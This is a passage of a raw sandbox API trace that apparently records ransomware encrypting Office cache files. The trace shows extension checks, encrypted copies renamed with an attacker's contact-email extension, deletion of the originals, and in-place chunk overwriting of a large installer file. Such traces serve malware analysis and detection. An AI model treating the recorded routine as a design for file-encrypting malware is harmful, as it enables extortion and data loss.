77 [0046.689] lstrlenW (lpString=".doc") returned 4 [0046.689] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0046.689] lstrlenW (lpString=".docx") returned 5 [0046.689] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0046.689] lstrlenW (lpString=".pdf") returned 4 [0046.689] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0046.689] lstrlenW (lpString=".xls") returned 4 [0046.689] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0046.689] lstrlenW (lpString=".xlsx") returned 5 [0046.689] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0046.689] lstrlenW (lpString=".ppt") returned 4 [0046.689] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0046.689] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi") returned 77 [0046.689] lstrlenW (lpString=".zip") returned 4 [0046.689] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0046.689] lstrlenW (lpString=".rar") returned 4 [0046.689] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0046.689] lstrlenW (lpString=".bz2") returned 4 [0046.689] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0046.689] lstrlenW (lpString=".7z") returned 3 [0046.689] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0046.689] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi") returned 77 [0046.689] lstrlenW (lpString=".dbf") returned 4 [0046.689] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0046.689] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi") returned 77 [0046.689] lstrlenW (lpString=".1cd") returned 4 [0046.689] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0046.689] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi") returned 77 [0046.689] lstrlenW (lpString=".jpg") returned 4 [0046.689] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0046.689] lstrcmpiW (lpString1=".dll", lpString2=".USA") returned -1 [0046.689] lstrlenW (lpString="dwintl20.dll") returned 12 [0046.690] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\1033\\dwintl20.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0046.690] GetFileSizeEx (in: hFile=0x1f4, lpFileSize=0x350ff1c | out: lpFileSize=0x350ff1c*=107912) returned 1 [0046.690] CloseHandle (hObject=0x1f4) returned 1 [0046.691] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\1033\\dwintl20.dll")) returned 0x2020 [0046.691] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\1033\\dwintl20.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0046.691] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\1033\\dwintl20.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0046.691] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x350fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.691] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x350fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.691] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\1033\\dwintl20.dll.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0046.948] GetLastError () returned 0x0 [0046.948] ReadFile (in: hFile=0x1f4, lpBuffer=0x3cd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x350fed4, lpOverlapped=0x0 | out: lpBuffer=0x3cd0020*, lpNumberOfBytesRead=0x350fed4*=0x1a588, lpOverlapped=0x0) returned 1 [0046.955] WriteFile (in: hFile=0x178, lpBuffer=0x3cd0020*, nNumberOfBytesToWrite=0x1a590, lpNumberOfBytesWritten=0x350fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3cd0020*, lpNumberOfBytesWritten=0x350fc9c*=0x1a590, lpOverlapped=0x0) returned 1 [0046.958] ReadFile (in: hFile=0x1f4, lpBuffer=0x3cd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x350fed4, lpOverlapped=0x0 | out: lpBuffer=0x3cd0020*, lpNumberOfBytesRead=0x350fed4*=0x0, lpOverlapped=0x0) returned 1 [0046.958] WriteFile (in: hFile=0x178, lpBuffer=0x3cd0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x350fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3cd0020*, lpNumberOfBytesWritten=0x350fc9c*=0xec, lpOverlapped=0x0) returned 1 [0046.958] SetEndOfFile (hFile=0x178) returned 1 [0046.958] CloseHandle (hObject=0x178) returned 1 [0046.958] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x350fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.958] SetEndOfFile (hFile=0x1f4) returned 1 [0046.959] CloseHandle (hObject=0x1f4) returned 1 [0046.960] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0046.960] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\1033\\dwintl20.dll")) returned 1 [0046.960] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll") returned 80 [0046.960] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll") returned 80 [0046.960] lstrlenW (lpString=".doc") returned 4 [0046.960] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0046.960] lstrlenW (lpString=".docx") returned 5 [0046.960] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0046.960] lstrlenW (lpString=".pdf") returned 4 [0046.960] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0046.960] lstrlenW (lpString=".xls") returned 4 [0046.960] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0046.960] lstrlenW (lpString=".xlsx") returned 5 [0046.960] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0046.960] lstrlenW (lpString=".ppt") returned 4 [0046.960] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0046.960] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll") returned 80 [0046.960] lstrlenW (lpString=".zip") returned 4 [0046.960] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0046.960] lstrlenW (lpString=".rar") returned 4 [0046.961] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0046.961] lstrlenW (lpString=".bz2") returned 4 [0046.961] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0046.961] lstrlenW (lpString=".7z") returned 3 [0046.961] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0046.961] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll") returned 80 [0046.961] lstrlenW (lpString=".dbf") returned 4 [0046.961] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0046.961] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll") returned 80 [0046.961] lstrlenW (lpString=".1cd") returned 4 [0046.961] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0046.961] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll") returned 80 [0046.961] lstrlenW (lpString=".jpg") returned 4 [0046.961] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0046.961] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll") returned 80 [0046.961] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll") returned 80 [0046.961] lstrlenW (lpString=".doc") returned 4 [0046.961] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0046.961] lstrlenW (lpString=".docx") returned 5 [0046.961] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0046.961] lstrlenW (lpString=".pdf") returned 4 [0046.961] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0046.961] lstrlenW (lpString=".xls") returned 4 [0046.961] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0046.961] lstrlenW (lpString=".xlsx") returned 5 [0046.961] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0046.961] lstrlenW (lpString=".ppt") returned 4 [0046.961] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0046.961] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll") returned 80 [0046.961] lstrlenW (lpString=".zip") returned 4 [0046.961] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0046.961] lstrlenW (lpString=".rar") returned 4 [0046.961] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0046.961] lstrlenW (lpString=".bz2") returned 4 [0046.961] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0046.962] lstrlenW (lpString=".7z") returned 3 [0046.962] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0046.962] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll") returned 80 [0046.962] lstrlenW (lpString=".dbf") returned 4 [0046.962] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0046.962] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll") returned 80 [0046.962] lstrlenW (lpString=".1cd") returned 4 [0046.962] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0046.962] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\dwintl20.dll") returned 80 [0046.962] lstrlenW (lpString=".jpg") returned 4 [0046.962] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0046.962] lstrcmpiW (lpString1=".dll", lpString2=".USA") returned -1 [0046.962] lstrlenW (lpString="dwdcw20.dll") returned 11 [0046.962] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwdcw20.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0046.962] GetFileSizeEx (in: hFile=0x1f4, lpFileSize=0x350ff1c | out: lpFileSize=0x350ff1c*=526176) returned 1 [0046.962] CloseHandle (hObject=0x1f4) returned 1 [0046.962] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwdcw20.dll")) returned 0x2020 [0046.963] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwdcw20.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0046.963] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwdcw20.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0046.963] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x350fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.963] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x350fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.963] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwdcw20.dll.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0046.963] GetLastError () returned 0x0 [0046.963] ReadFile (in: hFile=0x1f4, lpBuffer=0x3cd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x350fed4, lpOverlapped=0x0 | out: lpBuffer=0x3cd0020*, lpNumberOfBytesRead=0x350fed4*=0x80760, lpOverlapped=0x0) returned 1 [0046.975] WriteFile (in: hFile=0x178, lpBuffer=0x3cd0020*, nNumberOfBytesToWrite=0x80770, lpNumberOfBytesWritten=0x350fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3cd0020*, lpNumberOfBytesWritten=0x350fc9c*=0x80770, lpOverlapped=0x0) returned 1 [0046.985] ReadFile (in: hFile=0x1f4, lpBuffer=0x3cd0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x350fed4, lpOverlapped=0x0 | out: lpBuffer=0x3cd0020*, lpNumberOfBytesRead=0x350fed4*=0x0, lpOverlapped=0x0) returned 1 [0046.985] WriteFile (in: hFile=0x178, lpBuffer=0x3cd0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x350fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3cd0020*, lpNumberOfBytesWritten=0x350fc9c*=0xea, lpOverlapped=0x0) returned 1 [0046.985] SetEndOfFile (hFile=0x178) returned 1 [0046.985] CloseHandle (hObject=0x178) returned 1 [0046.985] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x350fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.985] SetEndOfFile (hFile=0x1f4) returned 1 [0047.343] CloseHandle (hObject=0x1f4) returned 1 [0047.499] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0047.507] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwdcw20.dll")) returned 1 [0047.507] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll") returned 74 [0047.507] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll") returned 74 [0047.507] lstrlenW (lpString=".doc") returned 4 [0047.507] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0047.507] lstrlenW (lpString=".docx") returned 5 [0047.507] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0047.507] lstrlenW (lpString=".pdf") returned 4 [0047.507] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0047.507] lstrlenW (lpString=".xls") returned 4 [0047.507] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0047.507] lstrlenW (lpString=".xlsx") returned 5 [0047.507] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0047.507] lstrlenW (lpString=".ppt") returned 4 [0047.507] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0047.508] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll") returned 74 [0047.508] lstrlenW (lpString=".zip") returned 4 [0047.508] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0047.508] lstrlenW (lpString=".rar") returned 4 [0047.508] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0047.508] lstrlenW (lpString=".bz2") returned 4 [0047.508] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0047.508] lstrlenW (lpString=".7z") returned 3 [0047.508] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0047.508] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll") returned 74 [0047.508] lstrlenW (lpString=".dbf") returned 4 [0047.508] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0047.508] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll") returned 74 [0047.508] lstrlenW (lpString=".1cd") returned 4 [0047.508] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0047.508] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll") returned 74 [0047.508] lstrlenW (lpString=".jpg") returned 4 [0047.508] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0047.508] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll") returned 74 [0047.508] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll") returned 74 [0047.508] lstrlenW (lpString=".doc") returned 4 [0047.508] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0047.508] lstrlenW (lpString=".docx") returned 5 [0047.508] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0047.508] lstrlenW (lpString=".pdf") returned 4 [0047.508] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0047.508] lstrlenW (lpString=".xls") returned 4 [0047.508] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0047.508] lstrlenW (lpString=".xlsx") returned 5 [0047.508] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0047.508] lstrlenW (lpString=".ppt") returned 4 [0047.508] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0047.508] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll") returned 74 [0047.508] lstrlenW (lpString=".zip") returned 4 [0047.508] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0047.508] lstrlenW (lpString=".rar") returned 4 [0047.509] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0047.509] lstrlenW (lpString=".bz2") returned 4 [0047.509] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0047.509] lstrlenW (lpString=".7z") returned 3 [0047.509] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0047.509] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll") returned 74 [0047.509] lstrlenW (lpString=".dbf") returned 4 [0047.509] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0047.509] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll") returned 74 [0047.509] lstrlenW (lpString=".1cd") returned 4 [0047.509] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0047.509] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll") returned 74 [0047.509] lstrlenW (lpString=".jpg") returned 4 [0047.509] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0047.509] lstrcmpiW (lpString1=".msi", lpString2=".USA") returned -1 [0047.509] lstrlenW (lpString="OfficeMUI.msi") returned 13 [0047.509] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0047.509] GetFileSizeEx (in: hFile=0x204, lpFileSize=0x350ff1c | out: lpFileSize=0x350ff1c*=3702272) returned 1 [0047.509] CloseHandle (hObject=0x204) returned 1 [0047.509] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.msi")) returned 0x2020 [0047.509] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.msi.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0047.510] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.msi.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 1 [0047.510] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.msi.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0047.510] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x350fc6c | out: lpNewFilePointer=0x0) returned 1 [0047.510] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x350fc2c | out: lpNewFilePointer=0x0) returned 1 [0047.510] ReadFile (in: hFile=0x204, lpBuffer=0x3cd0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x350fc38, lpOverlapped=0x0 | out: lpBuffer=0x3cd0058*, lpNumberOfBytesRead=0x350fc38*=0x40000, lpOverlapped=0x0) returned 1 [0047.515] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x12d4aa, lpNewFilePointer=0x0, dwMoveMethod=0x350fc2c | out: lpNewFilePointer=0x0) returned 1 [0047.515] ReadFile (in: hFile=0x204, lpBuffer=0x3d10058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x350fc38, lpOverlapped=0x0 | out: lpBuffer=0x3d10058*, lpNumberOfBytesRead=0x350fc38*=0x40000, lpOverlapped=0x0) returned 1 [0047.524] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x350fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0047.524] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x347e00, lpNewFilePointer=0x0, dwMoveMethod=0x350fc2c | out: lpNewFilePointer=0x0) returned 1 [0047.524] ReadFile (in: hFile=0x204, lpBuffer=0x3d50058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x350fc38, lpOverlapped=0x0 | out: lpBuffer=0x3d50058*, lpNumberOfBytesRead=0x350fc38*=0x40000, lpOverlapped=0x0) returned 1 [0047.538] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x350fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.538] WriteFile (in: hFile=0x204, lpBuffer=0x3cd0020*, nNumberOfBytesToWrite=0xc0106, lpNumberOfBytesWritten=0x350fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3cd0020*, lpNumberOfBytesWritten=0x350fcb0*=0xc0106, lpOverlapped=0x0) returned 1 [0047.705] SetEndOfFile (hFile=0x204) returned 1 [0047.705] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x40000) returned 0x3fe70d0 [0047.705] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x350fc7c | out: lpNewFilePointer=0x0) returned 1 [0047.705] WriteFile (in: hFile=0x204, lpBuffer=0x3fe70d0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x350fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fe70d0*, lpNumberOfBytesWritten=0x350fc88*=0x40000, lpOverlapped=0x0) returned 1 [0047.706] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x12d4aa, lpNewFilePointer=0x0, dwMoveMethod=0x350fc7c | out: lpNewFilePointer=0x0) returned 1 [0047.706] WriteFile (in: hFile=0x204, lpBuffer=0x3fe70d0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x350fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fe70d0*, lpNumberOfBytesWritten=0x350fc88*=0x40000, lpOverlapped=0x0) returned 1 [0047.710] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x347e00, lpNewFilePointer=0x0, dwMoveMethod=0x350fc7c | out: lpNewFilePointer=0x0) returned 1 [0047.710] WriteFile (in: hFile=0x204, lpBuffer=0x3fe70d0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x350fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fe70d0*, lpNumberOfBytesWritten=0x350fc88*=0x40000, lpOverlapped=0x0) returned 1 [0047.712] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3fe70d0 | out: hHeap=0x5d0000) returned 1 [0047.712] CloseHandle (hObject=0x204) returned 1 [0047.712] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0047.712] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi") returned 76 